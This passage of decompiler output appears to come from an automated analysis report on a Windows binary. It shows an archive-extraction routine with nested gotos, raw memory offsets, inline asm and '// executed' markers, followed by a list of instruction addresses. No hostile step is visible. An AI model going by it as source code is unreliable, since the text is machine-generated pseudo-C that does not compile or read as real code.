											 *((intOrPtr*)(_t709 - 0x38)) = _t690 + 0x10f8;
											_t86 = _t709 - 0x113c; // -2364
											E00E683F8(__eflags, _t579, _t86, _t690 + 0x10f8);
											__eflags =  *(_t709 - 0xe);
											if( *(_t709 - 0xe) != 0) {
												L50:
												 *(_t709 - 0xd) = 0;
												L51:
												_t401 =  *(_t690 + 8);
												_t595 = 0x45;
												__eflags =  *((char*)(_t401 + 0x6157));
												_t675 = 0x58;
												 *((intOrPtr*)(_t709 - 0x34)) = _t595;
												 *((intOrPtr*)(_t709 - 0x30)) = _t675;
												if( *((char*)(_t401 + 0x6157)) != 0) {
													L53:
													__eflags = _t700 - _t595;
													if(_t700 == _t595) {
														L55:
														_t97 = _t709 - 0x31ac; // -10668
														E00E67119(_t97);
														_push(0);
														_t98 = _t709 - 0x31ac; // -10668
														_t406 = E00E6A6B9(_t97, _t675, __eflags, _t690 + 0x10f8, _t98);
														__eflags = _t406;
														if(_t406 == 0) {
															_t407 =  *(_t690 + 8);
															__eflags =  *((char*)(_t407 + 0x6157));
															_t109 = _t709 - 0xd;
															 *_t109 =  *(_t709 - 0xd) & (_t407 & 0xffffff00 |  *((char*)(_t407 + 0x6157)) != 0x00000000) - 0x00000001;
															__eflags =  *_t109;
															L61:
															_t111 = _t709 - 0x113c; // -2364
															_t411 = E00E67E92(_t111, _t579, _t111);
															__eflags = _t411;
															if(_t411 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t579 + 0x331b));
																	if( *((char*)(_t579 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t116 = _t709 - 0x113c; // -2364
																	_t545 = E00E683C4(_t690, _t579);
																	__eflags = _t545;
																	if(_t545 == 0) {
																		 *((char*)(_t690 + 0x20f8)) = 1;
																		goto L219;
																	}
																	L65:
																	_t118 = _t709 - 0x13c; // 0x6c4
																	_t703 =  *(_t690 + 8) + 0x5024;
																	_t598 = 0x40;
																	memcpy(_t118,  *(_t690 + 8) + 0x5024, _t598 << 2);
																	_t713 = _t711 + 0xc;
																	asm("movsw");
																	_t121 = _t709 - 0x28; // 0x7d8
																	_t690 =  *((intOrPtr*)(_t709 - 0x20));
																	 *(_t709 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t128 = _t709 - 0x13c; // 0x6c4
																	E00E6CB95(_t690 + 0x10, 0,  *((intOrPtr*)(_t579 + 0x331c)), _t128,  ~( *(_t579 + 0x3320) & 0x000000ff) & _t579 + 0x00003321, _t579 + 0x3331,  *((intOrPtr*)(_t579 + 0x336c)), _t579 + 0x334b, _t121);
																	__eflags =  *((char*)(_t579 + 0x331b));
																	if( *((char*)(_t579 + 0x331b)) == 0) {
																		L73:
																		 *(_t709 - 4) =  *(_t709 - 4) | 0xffffffff;
																		_t147 = _t709 - 0x13c; // 0x6c4
																		L00E6ED8F(_t147);
																		_t148 = _t709 - 0x2164; // -6500
																		E00E697B6(_t148);
																		_t421 =  *(_t579 + 0x3380);
																		 *(_t709 - 4) = 1;
																		 *(_t709 - 0x2c) = _t421;
																		_t677 = 0x50;
																		__eflags = _t421;
																		if(_t421 == 0) {
																			L83:
																			_t422 = E00E620E0(_t579);
																			__eflags = _t422;
																			if(_t422 == 0) {
																				_t607 =  *(_t709 - 0xd);
																				__eflags = _t607;
																				if(_t607 == 0) {
																					_t703 =  *(_t709 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t579 + 0x6cb4));
																					if( *((char*)(_t579 + 0x6cb4)) == 0) {
																						__eflags = _t607;
																						if(_t607 == 0) {
																							L212:
																							 *(_t709 - 4) =  *(_t709 - 4) | 0xffffffff;
																							_t360 = _t709 - 0x2164; // -6500
																							E00E697F0(_t360, _t703);
																							__eflags =  *(_t709 - 0x12);
																							_t388 =  *(_t709 - 0xd);
																							_t678 =  *(_t709 - 0xe);
																							if( *(_t709 - 0x12) != 0) {
																								_t364 = _t690 + 0xec;
																								 *_t364 =  *(_t690 + 0xec) + 1;
																								__eflags =  *_t364;
																							}
																							L214:
																							__eflags =  *((char*)(_t690 + 0x60));
																							if( *((char*)(_t690 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t388;
																							if(_t388 != 0) {
																								L15:
																								_t396 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t579 + 0x6cb4)) - _t388;
																							if( *((intOrPtr*)(_t579 + 0x6cb4)) != _t388) {
																								__eflags = _t678;
																								if(_t678 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00E61EFA(_t579);
																							goto L15;
																						}
																						L101:
																						_t425 =  *(_t690 + 8);
																						__eflags =  *((char*)(_t425 + 0x6201));
																						if( *((char*)(_t425 + 0x6201)) == 0) {
																							L103:
																							_t426 =  *(_t709 - 0xe);
																							__eflags = _t426;
																							if(_t426 != 0) {
																								L108:
																								 *((char*)(_t709 - 0x11)) = 1;
																								__eflags = _t426;
																								if(_t426 != 0) {
																									L110:
																									 *((intOrPtr*)(_t690 + 0xe8)) =  *((intOrPtr*)(_t690 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t690 + 0x80)) = 0;
																									 *((intOrPtr*)(_t690 + 0x84)) = 0;
																									 *((intOrPtr*)(_t690 + 0x88)) = 0;
																									 *((intOrPtr*)(_t690 + 0x8c)) = 0;
																									E00E6AC78(_t690 + 0xc8, _t677,  *((intOrPtr*)(_t579 + 0x32f0)),  *((intOrPtr*)( *(_t690 + 8) + 0x82e0))); // executed
																									E00E6AC78(_t690 + 0xa0, _t677,  *((intOrPtr*)(_t579 + 0x32f0)),  *((intOrPtr*)( *(_t690 + 8) + 0x82e0)));
																									_t703 = _t690 + 0x10;
																									 *(_t690 + 0x30) =  *(_t579 + 0x32d8);
																									_t218 = _t709 - 0x2164; // -6500
																									 *(_t690 + 0x34) =  *(_t579 + 0x32dc);
																									E00E6CBDD(_t703, _t579, _t218);
																									_t679 =  *((intOrPtr*)(_t709 - 0x11));
																									_t614 = 0;
																									_t435 =  *(_t709 - 0xe);
																									 *((char*)(_t690 + 0x39)) = _t679;
																									 *((char*)(_t690 + 0x3a)) = _t435;
																									 *(_t709 - 0x24) = 0;
																									 *(_t709 - 0x1c) = 0;
																									__eflags = _t679;
																									if(_t679 != 0) {
																										L127:
																										_t680 =  *(_t690 + 8);
																										__eflags =  *((char*)(_t680 + 0x61a0));
																										 *((char*)(_t709 - 0x214b)) =  *((char*)(_t680 + 0x61a0)) == 0;
																										__eflags =  *((char*)(_t709 - 0x11));
																										if( *((char*)(_t709 - 0x11)) != 0) {
																											L131:
																											_t437 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t709 - 0x2c);
																											 *((char*)(_t709 - 0x10)) = _t614;
																											 *((char*)(_t709 - 0x14)) = _t437;
																											 *((char*)(_t709 - 0xf)) = _t437;
																											if( *(_t709 - 0x2c) == 0) {
																												__eflags =  *(_t579 + 0x3318);
																												if( *(_t579 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t579 + 0x22a0));
																													if(__eflags != 0) {
																														E00E72E9E(_t579,  *((intOrPtr*)(_t690 + 0xe0)), _t709,  *((intOrPtr*)(_t579 + 0x3374)),  *(_t579 + 0x3370) & 0x000000ff);
																														_t476 =  *((intOrPtr*)(_t690 + 0xe0));
																														 *(_t476 + 0x4c48) =  *(_t579 + 0x32e0);
																														__eflags = 0;
																														 *(_t476 + 0x4c4c) =  *(_t579 + 0x32e4);
																														 *((char*)(_t476 + 0x4c60)) = 0;
																														E00E72B4D( *((intOrPtr*)(_t690 + 0xe0)),  *((intOrPtr*)(_t579 + 0x229c)),  *(_t579 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t579 + 0x32e4));
																														_push( *(_t579 + 0x32e0));
																														_push(_t703); // executed
																														E00E69477(_t579, _t680, _t690, __eflags); // executed
																													}
																												}
																												L163:
																												E00E61EFA(_t579);
																												__eflags =  *((char*)(_t579 + 0x3319));
																												if( *((char*)(_t579 + 0x3319)) != 0) {
																													L166:
																													_t439 = 0;
																													__eflags = 0;
																													_t616 = 0;
																													L167:
																													__eflags =  *(_t579 + 0x3370);
																													if( *(_t579 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t579 + 0x22a0));
																														if( *((char*)(_t579 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t709 - 0xe);
																															 *((char*)(_t709 - 0x10)) = _t439;
																															if( *(_t709 - 0xe) != 0) {
																																L185:
																																__eflags =  *(_t709 - 0x2c);
																																_t681 =  *((intOrPtr*)(_t709 - 0xf));
																																if( *(_t709 - 0x2c) == 0) {
																																	L189:
																																	_t617 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t709 - 0x11));
																																	if( *((char*)(_t709 - 0x11)) != 0) {
																																		goto L212;
																																	}
																																	_t703 =  *(_t709 - 0x18);
																																	__eflags = _t703 -  *((intOrPtr*)(_t709 - 0x30));
																																	if(_t703 ==  *((intOrPtr*)(_t709 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t709 - 0x2c);
																																		if( *(_t709 - 0x2c) == 0) {
																																			L197:
																																			__eflags = _t439;
																																			if(_t439 == 0) {
																																				L200:
																																				__eflags = _t617;
																																				if(_t617 != 0) {
																																					L208:
																																					_t440 =  *(_t690 + 8);
																																					__eflags =  *((char*)(_t440 + 0x61a8));
																																					if( *((char*)(_t440 + 0x61a8)) == 0) {
																																						_t703 = _t690 + 0x10f8;
																																						_t441 = E00E6A637(_t690 + 0x10f8,  *((intOrPtr*)(_t579 + 0x22a4))); // executed
																																						__eflags = _t441;
																																						if(__eflags == 0) {
																																							E00E66D72(__eflags, 0x11, _t579 + 0x24, _t703);
																																							E00E67002(__eflags);
																																						}
																																					}
																																					 *(_t690 + 0x10f7) = 1;
																																					goto L212;
																																				}
																																				_t682 =  *(_t709 - 0x1c);
																																				__eflags = _t682;
																																				_t620 =  *(_t709 - 0x24);
																																				if(_t682 > 0) {
																																					L203:
																																					__eflags = _t439;
																																					if(_t439 != 0) {
																																						L206:
																																						_t333 = _t709 - 0x2164; // -6500
																																						E00E6A05F(_t333);
																																						L207:
																																						_t703 = _t579 + 0x32d0;
																																						_t695 = _t579 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t341 = _t709 - 0x2164; // -6500
																																						E00E69F02(_t341, _t579 + 0x32d0,  ~( *( *(_t690 + 8) + 0x72d0)) & _t695,  ~( *( *(_t690 + 8) + 0x72d4)) & _t579 + 0x000032c8,  ~( *( *(_t690 + 8) + 0x72d8)) & _t579 + 0x000032d0);
																																						_t342 = _t709 - 0x2164; // -6500
																																						E00E69870(_t342);
																																						E00E67CA0( *((intOrPtr*)(_t709 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t709 - 0x20)) + 8)), _t579,  *((intOrPtr*)(_t709 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t709 - 0x20)) + 8)) + 0x72d0)) & _t695;
																																						E00E69EFF( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t709 - 0x20)) + 8)) + 0x72d0)) & _t695,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t709 - 0x20)) + 8)) + 0x72d0)) & _t695,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t709 - 0x20)) + 8)) + 0x72d8)) & _t579 + 0x000032d0);
																																						_t690 =  *((intOrPtr*)(_t709 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t690 + 0x88)) - _t620;
																																					if( *((intOrPtr*)(_t690 + 0x88)) != _t620) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t690 + 0x8c)) - _t682;
																																					if( *((intOrPtr*)(_t690 + 0x8c)) == _t682) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t620;
																																				if(_t620 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t464 =  *(_t690 + 8);
																																			__eflags =  *((char*)(_t464 + 0x61a0));
																																			if( *((char*)(_t464 + 0x61a0)) == 0) {
																																				goto L212;
																																			}
																																			_t439 =  *((intOrPtr*)(_t709 - 0x10));
																																			goto L200;
																																		}
																																		__eflags = _t617;
																																		if(_t617 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t579 + 0x3380) - 5;
																																		if( *(_t579 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t681;
																																		if(_t681 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t703 -  *((intOrPtr*)(_t709 - 0x34));
																																	if(_t703 !=  *((intOrPtr*)(_t709 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t579 + 0x3380) - 4;
																																if( *(_t579 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t681;
																																if(_t681 == 0) {
																																	goto L189;
																																}
																																_t617 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t709 - 0x14));
																															if( *((char*)(_t709 - 0x14)) == 0) {
																																goto L185;
																															}
																															__eflags = _t616;
																															if(_t616 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t579 + 0x331b)) - _t616;
																															if(__eflags == 0) {
																																L183:
																																_t313 = _t709 - 0x113c; // -2364
																																_push(_t579 + 0x24);
																																_push(3);
																																L184:
																																E00E66D72(__eflags);
																																 *((char*)(_t709 - 0x10)) = 1;
																																E00E66FBA(0xea0f50, 3);
																																_t439 =  *((intOrPtr*)(_t709 - 0x10));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t579 + 0x3341)) - _t616;
																															if( *((intOrPtr*)(_t579 + 0x3341)) == _t616) {
																																L181:
																																__eflags =  *((char*)(_t690 + 0xf4));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t311 = _t709 - 0x113c; // -2364
																																_push(_t579 + 0x24);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t579 + 0x6cc4) - _t616;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t579 + 0x32e4) - _t439;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t616;
																															if(_t616 != 0) {
																																 *((char*)(_t690 + 0xf4)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t579 + 0x32e0) - _t439;
																														if( *(_t579 + 0x32e0) <= _t439) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t690 + 0xf4)) = _t439;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t473 = E00E6AC46(_t690 + 0xc8, _t690, _t579 + 0x32f0,  ~( *(_t579 + 0x334a) & 0x000000ff) & _t579 + 0x0000334b);
																												__eflags = _t473;
																												if(_t473 == 0) {
																													goto L166;
																												}
																												_t616 = 1;
																												_t439 = 0;
																												goto L167;
																											}
																											_t703 =  *(_t579 + 0x3380);
																											__eflags = _t703 - 4;
																											if(__eflags == 0) {
																												L146:
																												_push(0x800);
																												_t263 = _t709 - 0x41ac; // -14764
																												E00E683F8(__eflags, _t579, _t579 + 0x3384, _t263);
																												_t614 =  *((intOrPtr*)(_t709 - 0x10));
																												__eflags = _t614;
																												if(_t614 == 0) {
																													L153:
																													_t483 =  *((intOrPtr*)(_t709 - 0xf));
																													L154:
																													__eflags =  *((intOrPtr*)(_t579 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t579 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t614;
																														if(_t614 == 0) {
																															L157:
																															_t484 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t690 + 0x10f7) = _t484;
																															goto L163;
																														}
																														L142:
																														__eflags = _t483;
																														if(_t483 == 0) {
																															goto L157;
																														}
																														_t484 = 1;
																														goto L158;
																													}
																													__eflags = _t614;
																													if(_t614 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t709 - 0x14)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t709 - 0x41ac));
																												if( *((short*)(_t709 - 0x41ac)) == 0) {
																													goto L153;
																												}
																												_t267 = _t709 - 0x41ac; // -14764
																												_push(0x800);
																												_push(_t690 + 0x10f8);
																												__eflags = _t703 - 4;
																												if(__eflags != 0) {
																													_push(_t579 + 0x24);
																													_t271 = _t709 - 0x2164; // -6500
																													_t483 = E00E693B5(_t680, _t690, _t703, __eflags);
																												} else {
																													_push( *(_t690 + 8));
																													_t483 = E00E6775C(_t614, __eflags);
																												}
																												L151:
																												 *((char*)(_t709 - 0xf)) = _t483;
																												__eflags = _t483;
																												if(_t483 == 0) {
																													L139:
																													_t614 =  *((intOrPtr*)(_t709 - 0x10));
																													goto L140;
																												}
																												_t614 =  *((intOrPtr*)(_t709 - 0x10));
																												goto L154;
																											}
																											__eflags = _t703 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t703 - _t437;
																											if(_t703 == _t437) {
																												L144:
																												__eflags = _t614;
																												if(_t614 == 0) {
																													goto L153;
																												}
																												_push(_t690 + 0x10f8);
																												_t483 = E00E679D6(_t680, _t690 + 0x10, _t579);
																												goto L151;
																											}
																											__eflags = _t703 - 2;
																											if(_t703 == 2) {
																												goto L144;
																											}
																											__eflags = _t703 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00E66D72(__eflags, 0x47, _t579 + 0x24, _t690 + 0x10f8);
																											__eflags = 0;
																											_t483 = 0;
																											 *((char*)(_t709 - 0xf)) = 0;
																											goto L139;
																										}
																										__eflags = _t435;
																										if(_t435 != 0) {
																											goto L131;
																										}
																										_t495 = 0x50;
																										__eflags =  *(_t709 - 0x18) - _t495;
																										if( *(_t709 - 0x18) == _t495) {
																											goto L131;
																										}
																										_t437 = 1;
																										_t614 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t579 + 0x6cc4);
																									if( *(_t579 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t705 =  *(_t579 + 0x32e4);
																									_t688 =  *(_t579 + 0x32e0);
																									__eflags = _t705;
																									if(__eflags < 0) {
																										L126:
																										_t703 = _t690 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t638 =  *(_t579 + 0x32d8);
																										_t639 = _t638 << 0xa;
																										__eflags = ( *(_t579 + 0x32dc) << 0x00000020 | _t638) << 0xa - _t705;
																										if(__eflags < 0) {
																											L125:
																											_t435 =  *(_t709 - 0xe);
																											_t614 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t705;
																											if(__eflags < 0) {
																												L124:
																												_t238 = _t709 - 0x2164; // -6500
																												E00E69CC1(_t238,  *(_t579 + 0x32e0),  *(_t579 + 0x32e4));
																												 *(_t709 - 0x24) =  *(_t579 + 0x32e0);
																												 *(_t709 - 0x1c) =  *(_t579 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t503 = E00E69A85(_t688);
																												__eflags = _t688 -  *(_t579 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t503 -  *(_t579 + 0x32d8);
																												if(_t503 <=  *(_t579 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t688 - 0x5f5e100;
																											if(_t688 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t639 - _t688;
																										if(_t639 <= _t688) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t688 - 0xf4240;
																									if(_t688 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t199 = _t690 + 0xe4;
																								 *_t199 =  *(_t690 + 0xe4) + 1;
																								__eflags =  *_t199;
																								goto L110;
																							}
																							 *((char*)(_t709 - 0x11)) = 0;
																							_t505 = 0x50;
																							__eflags = _t703 - _t505;
																							if(_t703 != _t505) {
																								_t193 = _t709 - 0x2164; // -6500
																								__eflags = E00E69B29(_t193);
																								if(__eflags != 0) {
																									E00E66D72(__eflags, 0x3b, _t579 + 0x24, _t690 + 0x10f8);
																									E00E670D6(0xea0f50, _t709, _t579 + 0x24, _t690 + 0x10f8);
																								}
																							}
																							goto L109;
																						}
																						 *(_t690 + 0x10f7) = 1;
																						__eflags =  *((char*)(_t425 + 0x6201));
																						if( *((char*)(_t425 + 0x6201)) != 0) {
																							_t426 =  *(_t709 - 0xe);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t709 - 0xe) = 1;
																					 *(_t709 - 0xd) = 1;
																					_t183 = _t709 - 0x113c; // -2364
																					_t515 = L00E7168D(_t607, _t183, 0, 0, 1);
																					__eflags = _t515;
																					if(_t515 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t709 - 0x1c) = 0;
																					L99:
																					_t185 = _t709 - 0x2164; // -6500
																					E00E697F0(_t185, _t703);
																					_t396 =  *(_t709 - 0x1c);
																					goto L16;
																				}
																				_t175 = _t709 - 0x2164; // -6500
																				_push(_t579);
																				_t519 = E00E6826D(_t690);
																				_t703 =  *(_t709 - 0x18);
																				_t607 = _t519;
																				 *(_t709 - 0xd) = _t607;
																				L93:
																				__eflags = _t607;
																				if(_t607 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t709 - 0xd);
																			if( *(_t709 - 0xd) != 0) {
																				_t520 =  *(_t709 - 0x18);
																				__eflags = _t520 - 0x50;
																				if(_t520 != 0x50) {
																					_t646 = 0x49;
																					__eflags = _t520 - _t646;
																					if(_t520 != _t646) {
																						_t647 = 0x45;
																						__eflags = _t520 - _t647;
																						if(_t520 != _t647) {
																							_t521 =  *(_t690 + 8);
																							__eflags =  *((intOrPtr*)(_t521 + 0x615c)) - 1;
																							if( *((intOrPtr*)(_t521 + 0x615c)) != 1) {
																								 *(_t690 + 0xe4) =  *(_t690 + 0xe4) + 1;
																								_t173 = _t709 - 0x113c; // -2364
																								E00E6804C(_t690, _t579, _t173);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t421 - 5;
																		if(_t421 == 5) {
																			goto L83;
																		}
																		_t607 =  *(_t709 - 0xd);
																		_t703 =  *(_t709 - 0x18);
																		__eflags = _t607;
																		if(_t607 == 0) {
																			goto L96;
																		}
																		__eflags = _t703 - _t677;
																		if(_t703 == _t677) {
																			goto L93;
																		}
																		_t524 =  *(_t690 + 8);
																		__eflags =  *((char*)(_t524 + 0x6201));
																		if( *((char*)(_t524 + 0x6201)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t709 - 0x11)) = 0;
																		_t527 = E00E6A373(_t690 + 0x10f8);
																		__eflags = _t527;
																		if(_t527 == 0) {
																			L81:
																			__eflags =  *((char*)(_t709 - 0x11));
																			if( *((char*)(_t709 - 0x11)) == 0) {
																				_t607 =  *(_t709 - 0xd);
																				goto L93;
																			}
																			L82:
																			_t607 = 0;
																			 *(_t709 - 0xd) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t709 - 0x11));
																		if( *((char*)(_t709 - 0x11)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t579 + 0x32c0);
																		_t161 = _t709 - 0x11; // 0x7ef
																		E00E69508(0,  *(_t690 + 8), 0, _t690 + 0x10f8, 0x800, _t161,  *(_t579 + 0x32e0),  *(_t579 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t579 + 0x3341));
																	if( *((char*)(_t579 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t133 = _t709 - 0x28; // 0x7d8
																	_t535 = E00E8009A(_t579 + 0x3342, _t133, 8);
																	_t711 = _t713 + 0xc;
																	__eflags = _t535;
																	if(_t535 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t579 + 0x6cc4);
																	if( *(_t579 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t690 + 0x10f6));
																	_t137 = _t709 - 0x113c; // -2364
																	_push(_t579 + 0x24);
																	if(__eflags != 0) {
																		_push(6);
																		E00E66D72(__eflags);
																		E00E66FBA(0xea0f50, 0xb);
																		__eflags = 0;
																		 *(_t709 - 0xd) = 0;
																		goto L73;
																	}
																	_push(0x80);
																	E00E66D72(__eflags);
																	E00E6EE02( *(_t690 + 8) + 0x5024);
																	 *(_t709 - 4) =  *(_t709 - 4) | 0xffffffff;
																	_t142 = _t709 - 0x13c; // 0x6c4
																	L00E6ED8F(_t142);
																}
															}
															E00E66FBA(0xea0f50, 2);
															_t547 = E00E61EFA(_t579);
															__eflags =  *((char*)(_t579 + 0x6cb4));
															_t396 = _t547 & 0xffffff00 |  *((char*)(_t579 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t101 = _t709 - 0x219c; // -6556
														_t549 = E00E67E6B(_t101, _t579 + 0x32c0);
														__eflags = _t549;
														if(_t549 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t709 - 0x21a0));
														if( *((char*)(_t709 - 0x21a0)) == 0) {
															L59:
															 *(_t709 - 0xd) = 0;
															goto L61;
														}
														_t103 = _t709 - 0x219c; // -6556
														_t551 = E00E67E4D(_t103, _t690);
														__eflags = _t551;
														if(_t551 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t700 - _t675;
													if(_t700 != _t675) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t401 + 0x6158));
												if( *((char*)(_t401 + 0x6158)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t690 + 0x10f8);
											if( *(_t690 + 0x10f8) == 0) {
												goto L50;
											}
											 *(_t709 - 0xd) = 1;
											__eflags =  *(_t579 + 0x3318);
											if( *(_t579 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t700 - _t390;
										_t391 = 1;
										if(_t700 != _t390) {
											goto L46;
										}
										goto L45;
									}
									_t678 =  *((intOrPtr*)(_t579 + 0x6cb4));
									 *(_t709 - 0xe) = _t678;
									 *(_t709 - 0x24) = _t678;
									__eflags = _t678;
									if(_t678 == 0) {
										goto L214;
									} else {
										_t674 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t690 + 0xec) -  *((intOrPtr*)(_t582 + 0xa334));
								if( *(_t690 + 0xec) <  *((intOrPtr*)(_t582 + 0xa334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t690 + 0xf1));
								if( *((char*)(_t690 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t579 + 0x32e0) = _t673;
								 *(_t579 + 0x32e4) = _t673;
								goto L26;
							}
							__eflags =  *(_t579 + 0x32e0) - _t673;
							if( *(_t579 + 0x32e0) >= _t673) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t579 + 0x32d8) = _t673;
							 *(_t579 + 0x32dc) = _t673;
							goto L22;
						}
						__eflags =  *(_t579 + 0x32d8) - _t673;
						if( *(_t579 + 0x32d8) >= _t673) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t697 - 3;
					if(_t697 != 3) {
						L10:
						__eflags = _t697 - 5;
						if(_t697 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t579 + 0x45ac));
						if( *((char*)(_t579 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t709 - 0x18));
						_push(0);
						_push(_t690 + 0x10);
						_push(_t579);
						_t568 = E00E786FD(_t673);
						__eflags = _t568;
						if(_t568 != 0) {
							__eflags = 0;
							 *0xe93260( *((intOrPtr*)(_t579 + 0x6ca0)),  *((intOrPtr*)(_t579 + 0x6ca4)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t579 + 0x10))))();
							goto L15;
						} else {
							E00E66FBA(0xea0f50, 1);
							goto L219;
						}
					}
					__eflags =  *(_t690 + 0x10f7);
					if( *(_t690 + 0x10f7) == 0) {
						goto L217;
					} else {
						E00E67C35(_t579, _t709,  *(_t690 + 8), _t579, _t690 + 0x10f8);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t690 + 0x5f)) == 0) {
					L4:
					_t396 = 0;
					goto L17;
				}
				_push(_t372);
				_push(0);
				_push(_t690 + 0x10);
				_push(_t579);
				if(E00E786FD(0) != 0) {
					_t673 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00E66FBA(0xea0f50, 1);
					goto L4;
				}
			}

0x00e68709
0x00e6870e
0x00e68718
0x00e6871e
0x00e68721
0x00e68724
0x00e68726
0x00e6872c
0x00e68733
0x00e68739
0x00e68765
0x00e68766
0x00e6876c
0x00e6876f
0x00e68808
0x00e6880e
0x00e68814
0x00e6882c
0x00e6882c
0x00e68832
0x00e6884a
0x00e6884a
0x00e6884d
0x00e68853
0x00e68870
0x00e68875
0x00e68879
0x00e68883
0x00e6888e
0x00e68893
0x00e68895
0x00e68898
0x00e6889b
0x00e6889d
0x00e6889f
0x00e688a3
0x00e688a5
0x00e688a7
0x00e688a7
0x00e688a3
0x00e688af
0x00e688b4
0x00e688b5
0x00e688c2
0x00e688c3
0x00e688cb
0x00e688d2
0x00e688d5
0x00e6892c
0x00e68931
0x00e68933
0x00e68935
0x00e6893b
0x00e68941
0x00e68945
0x00e68945
0x00e68945
0x00e68945
0x00e688d7
0x00e688da
0x00e688e0
0x00e688e2
0x00e688e4
0x00e688e8
0x00e688ea
0x00e688f1
0x00e688f6
0x00e688f7
0x00e688fe
0x00e68903
0x00e6890d
0x00e6890f
0x00e68925
0x00e68911
